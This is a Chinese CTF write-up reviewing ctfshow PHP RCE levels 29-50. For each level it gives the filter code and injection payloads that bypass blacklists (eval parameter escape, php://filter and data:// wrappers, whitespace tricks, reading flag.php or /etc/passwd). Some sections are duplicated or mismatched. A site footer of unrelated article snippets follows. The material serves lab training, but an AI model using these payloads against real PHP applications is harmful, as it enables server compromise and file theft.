Rce漏洞复习(ctfshow29-50)

Rce漏洞简介思维导图

Web29

代码审计:

if(!preg_match("/flag/i", $c)){
        eval($c);

传参没有flag(大小写都没有出现)

Payload:

?c=system("ls");

?c=system("tac *lag.php");

Web30

代码审计:过滤了flag|system|php

if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }

payload:

?c=echo shell_exec("tac f*");

Web31

代码审计:参数逃逸绕过空格

if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }

payload:

?c=eval($_GET["p"]);&p=system("tac flag.php");

Web32

过滤内容

if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(/i”, $c))

参数逃逸+为协议绕过+%0a绕过空格

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

Base64解码

Web32

过滤内容

if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(/i”, $c))

参数逃逸+为协议绕过+%0a绕过空格

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

Base64解码

Web32

过滤内容

if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(/i”, $c))

参数逃逸+为协议绕过+%0a绕过空格

payload

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

Base64解码

Web33

过滤语句

if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|”/i", $c))

参数逃逸+为协议绕过+%0a绕过空格

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

Base64解码

Web34

过滤内容

if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|”/i", $c))

参数逃逸+为协议绕过+%0a绕过空格

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

Base64解码

Web35

过滤了多一个>

!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|:|”|<|=/i", $c)){

过滤内容

if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|”/i", $c))

参数逃逸+为协议绕过+%0a绕过空格

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

Base64解码

Web36

过滤语句(多了对数字的过滤)

if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|:|”|<|=|/|[0-9]/i", $c))

payload参数逃逸+为协议绕过+%0a绕过空格,get传参变为a

?c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php

Web37

if(!preg_match("/flag/i", $c)){

        include($c);

        echo $flag;

利用include函数,绕过flag,用data为协议(data://text/plain)

Payload:

?c=data://text/plain,<?php system('tac fl*.*');?>

Web38

if(!preg_match("/flag|php|file/i", $c)){

        include($c);

        echo $flag;    

    }

利用include函数,绕过flag,用data为协议(data://text/plain)

Payload:

?c=data://text/plain,<?php system('tac fl*.*');?>

Web39

if(isset($_GET['c'])){

    $c = $_GET['c'];

    if(!preg_match("/flag/i", $c)){

        include($c.".php");

    }

利用include函数,绕过flag,用data为协议(data://text/plain)

Payload:

?c=data://text/plain,<?php system('tac fl*.*');?>

Web40

正则转换在线网站

RegexperRegular expression visualizer using railroad diagramsicon-default.png?t=N7T8https://regexper.com/

?c=print_r(get_defined_vars());可以输出所有的变量,如果此时通过post传递一个1=phpinfo();,那么打印的变量就会多一个

根据输出内容可以看到post传递的内容在数组的第二个中

通过next即可获取到数组中的第二个数组的指针。并打印出来。

然后利用array_pop()这个函数将数组中的值可以弹出

?c=eval(array_pop((next(get_defined_vars()))));

post中提交 1=system(‘tac flag.php’);

解释:通过post传递一个值,会存储在当前页面的变量中,get_defined_vars()获取当前页面所有变量,next取当前页面变量的第二个,也就是一个数组,array_pop是弹出数组的值,eval执行弹出的值。

Payload(无参rce):

?c=eval(pos(next(get_defined_vars())));

post data:

1=system("tac fla*");

Web41

Web42

system($c." >/dev/null 2>&1");

c参数变量拼接了>/dev/null 2>&1

或运算符绕过,%0a换行绕过

Payload

url + ?c=tac flag.php ||

url +?c=tac flag.php ; ls

url + ?c=tac flag.php%0a

Web43

if(!preg_match("/;|cat|flag/i", $c)){

system($c." >/dev/null 2>&1");

nl,tac绕过cat

c参数变量拼接了>/dev/null 2>&1

或运算符绕过,%0a换行绕过

Payload

url + ?c=tac flag.php ||

url +?c=tac flag.php ; ls

url + ?c=tac flag.php%0a

Web44

if(!preg_match("/;|cat|flag/i", $c)){

    system($c." >/dev/null 2>&1");

Flag绕过方法拼接和*

nl,tac绕过cat

c参数变量拼接了>/dev/null 2>&1

或运算符绕过,%0a换行绕过

Payload

url + ?c=tac fl''ag.php||

url + ?c=tac fl*%0A

Web45

if(!preg_match("/\;|cat|flag| /i", $c)){

    system($c." >/dev/null 2>&1");

过滤了空格

空格绕过

<、<>、%20(space)、%09(tab)、$IFS$9、${IFS}、$IFS、{cat,/etc/passwd}、%0a(回车)

Payload

url + ?c=tac%09fl''ag.php||

Web46

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){

        system($c." >/dev/null 2>&1");

绕过空格

url + ?c=tac%09fl?g.php||

url + ?c=tac%09fl''ag.php||

Web47

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){

        system($c." >/dev/null 2>&1");

绕过空格

url + ?c=tac%09fl?g.php||

url + ?c=tac%09fl''ag.php||

Web48

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){

        system($c." >/dev/null 2>&1");

绕过空格

url + ?c=tac%09fl?g.php||

url + ?c=tac%09fl''ag.php||

Web49

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){

        system($c." >/dev/null 2>&1");

绕过空格

url + ?c=tac%09fl?g.php||

url + ?c=tac%09fl''ag.php||

Web50

if(isset($_GET['c'])){

    $c=$_GET['c'];

    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){

        system($c." >/dev/null 2>&1");

    }

}else{

    highlight_file(__FILE__);

}

Payload:

url + ?c=tac<>fl''ag.php||

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/50056.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

ubuntu2004 android webRTC编译环境搭建

一、官网下载VMware Workstation Pro16&#xff0c;下载地址&#xff0c;安装教程 二、下载ubuntu2004镜像&#xff0c;下载地址 三、webrtc编译 安装depot_tools 步骤如下 wget https://dl.google.com/android/repository/commandlinetools-linux-6609375_latest.zip unzi…

如何减少白屏的时间

前端性能优化是前端开发中一个重要环节&#xff0c;它包括很多内容&#xff0c;其中页面的白屏时间是用户最初接触到的部分&#xff0c;白屏时间过长会显著影响用户的留存率和转换率。 我们以一个 APP 内嵌 Webview 打开页面作为例子&#xff0c;来分析页面打开过程以及可优化…

文件上传漏洞(ctfshow web151-161)

Web151 F12修改源代码 exts后面png改为php 这样就可以上传php的文件了 Web152&#xff1a; 考点&#xff1a;后端不能单一校验 就是要传图片格式&#xff0c;抓个包传个png的图片 然后bp抓包修改php后缀解析 然后放包 Web153-web156 在php代码中可以使用“{}”代替“[]” …

如何防御IP劫持

摘要 IP劫持是一种网络攻击方式&#xff0c;攻击者通过各种手段获取对某个IP地址的控制权&#xff0c;并将其用于恶意目的。这种攻击可能会导致数据泄露、服务中断等严重后果。本文将介绍IP劫持的基本概念、攻击方式以及防御策略&#xff0c;并提供一些实际的代码示例。 IP劫…

WPF项目实战视频《二》(主要为prism框架)

14.prism框架知识&#xff08;1&#xff09; 使用在多个平台的MVVM框架 新建WPF项目prismDemo 项目中&#xff1a;工具-NuGet包管理&#xff1a;安装Prism.DryIoc框架 在git中能看Prism的结构和源代码&#xff1a;git链接地址 例如&#xff1a;Prism/src/Wpf/Prism.DryIoc.Wpf…

机器学习 | 回归算法原理——随机梯度下降法

Hi&#xff0c;大家好&#xff0c;我是半亩花海。接着上次的多重回归继续更新《白话机器学习的数学》这本书的学习笔记&#xff0c;在此分享随机梯度下降法这一回归算法原理。本章的回归算法原理还是基于《基于广告费预测点击量》项目&#xff0c;欢迎大家交流学习&#xff01;…

uniapp中出现图片过小会与盒子偏离

结论&#xff1a;在image的父盒子中加上display: flex&#xff0c;原因不清楚 出问题的代码和图片如下&#xff1a; <template><view style" background-color: greenyellow; height: 10rpx;width: 10rpx;"><image :src"imgSrc.seatnull" …

Ubuntu22.04使用NVM安装多版本Node.js和版本切换

Fabric官方目前支持Node.js开发区块链应用&#xff0c;建议使用Node长期支持版本&#xff08;LTS&#xff09;。 建议使用NVM安装Node.js&#xff0c;NVM可以帮助我们方便的在Node的不同版本之间进行切换&#xff0c;这样我们就可以同时工作在不同的项目上。 下面是安装的脚本…

Java中的Console对象:增强程序与用户交互的利器(readPassword()、readLine(),printf() 和format() )

在Java编程语言中&#xff0c;System.console() 方法扮演着尝试获取与当前运行的Java应用程序相关联的控制台&#xff08;Console&#xff09;对象的角色。这个控制台对象&#xff0c;如果成功获取&#xff0c;为程序提供了一个与用户进行交互的界面&#xff0c;无论是读取输入…

嵌入式C++、MQTT、数据库、Grafana、机器学习( Scikit-learn):智能建筑大数据管理平台(代码示例)

项目概述 智能建筑管理系统&#xff08;Intelligent Building Management System, IBMS&#xff09;是一个集成多种技术的复杂系统&#xff0c;旨在通过智能化手段提升建筑的管理效率、节能效果和居住舒适度。该系统涉及嵌入式系统、物联网&#xff08;IoT&#xff09;、大数据…

【数据库】 mysql基础语法学习(详细教程)

1. 数据库的基本操作1.1. MYSQL 登录与退出输入 mysql -uroot -p -P3306 -h127.0.0.1退出的三种方法mysql > exit;mysql > quit;mysql > \q;1.2. MYSQL 数据库的一些解释注意&#xff1a;数据库就相当于文件夹表就相当于文件1.3. mysql 注释符有三种&#xff1a;1、#.…

光明乳业:以科技赋能品质,引领乳业绿色新未来

近日&#xff0c;光明乳业再次成为行业焦点&#xff0c;其在科技创新与绿色发展方面的卓越表现赢得了广泛赞誉。作为中国乳制品行业的领军企业&#xff0c;光明乳业始终坚守品质至上的原则&#xff0c;不断探索科技创新之路&#xff0c;致力于为消费者提供更高品质、更健康的乳…

vdb:虚拟数据库

将文件虚拟成数据库&#xff0c;序列化写入、反序列化读取、直接读取。

Adobe正通过数字体验改变世界

在当今这个数字化飞速发展的时代&#xff0c;Adobe公司正以其创新的技术和卓越的产品引领着创意设计领域的变革。从Adobe发布的生成式AI工具&#xff08;Adobe Firefly&#xff09;&#xff0c;到Illustrator和Photoshop的新AI功能&#xff0c;再到广受认可的Adobe国际认证&…

GLSL教程 第5章:光照和材质

目录 5.1 光照模型基础 5.2 Phong光照模型 5.3 Blinn-Phong光照模型 5.4 Cook-Torrance光照模型 5.5 Lambert光照模型 5.6 材质属性的深入讲解 小结 光照和材质是计算机图形学中至关重要的元素&#xff0c;它们共同决定了渲染图像的视觉效果。光照模型用于模拟光源与物体…

政安晨【零基础玩转各类开源AI项目】基于Ubuntu系统部署LivePortrait :通过缝合和重定向控制实现高效的肖像动画制作

目录 项目论文介绍 论文中实际开展的工作 非扩散性的肖像动画 基于扩散的肖像动画 方法论 基于Ubuntu的部署实践开始 1. 克隆代码并准备环境 2. 下载预训练权重 3. 推理 快速上手 驱动视频自动裁剪 运动模板制作 4. Gradio 界面 5. 推理速度评估 社区资源 政安…

electron安装及快速创建

electron安装及快速创建 electron是一个使用 JavaScript、HTML 和 CSS 构建桌面应用程序的框架。 详细内容见官网&#xff1a;https://www.electronjs.org/zh/docs/latest/。 今天来记录下练习中的安装过程和hello world的创建。 创建项目文件夹&#xff0c;并执行npm 初始化命…

C++实用指南:Lambda 表达式的妙用

Lambda 表达式的灵活性和强大功能确实为编程提供了许多便利。但是我们发现许多开发者仍然无法灵活运用其便利&#xff0c;于是写了这篇文章。 Lambda 允许我们编写更简洁和灵活的代码。例如在处理网络请求时&#xff0c;我们经常需要确保响应与当前的状态或需求仍然相关。通过…

STM32 | RTC闹钟实战

点击上方"蓝字"关注我们 01、rtc.h #ifndef __RTC_H#define __RTC_H​#include "stm32f4xx.h"#include "delay.h"#include "led.h"​void Rtc_My_Init(void);void RTC_Alarm_MyA(void);​​​#endif 02、rtc.c #include "rtc.h…

了解ChatGPT API

要了解如何使用 ChatGPT API&#xff0c;可以参考几个有用的资源和教程&#xff0c;这些资源能帮助你快速开始使用 API 进行项目开发。下面是一些推荐的资源&#xff1a; OpenAI 官方文档&#xff1a; 访问 OpenAI 的官方网站可以找到 ChatGPT API 的详细文档。这里包括了 API …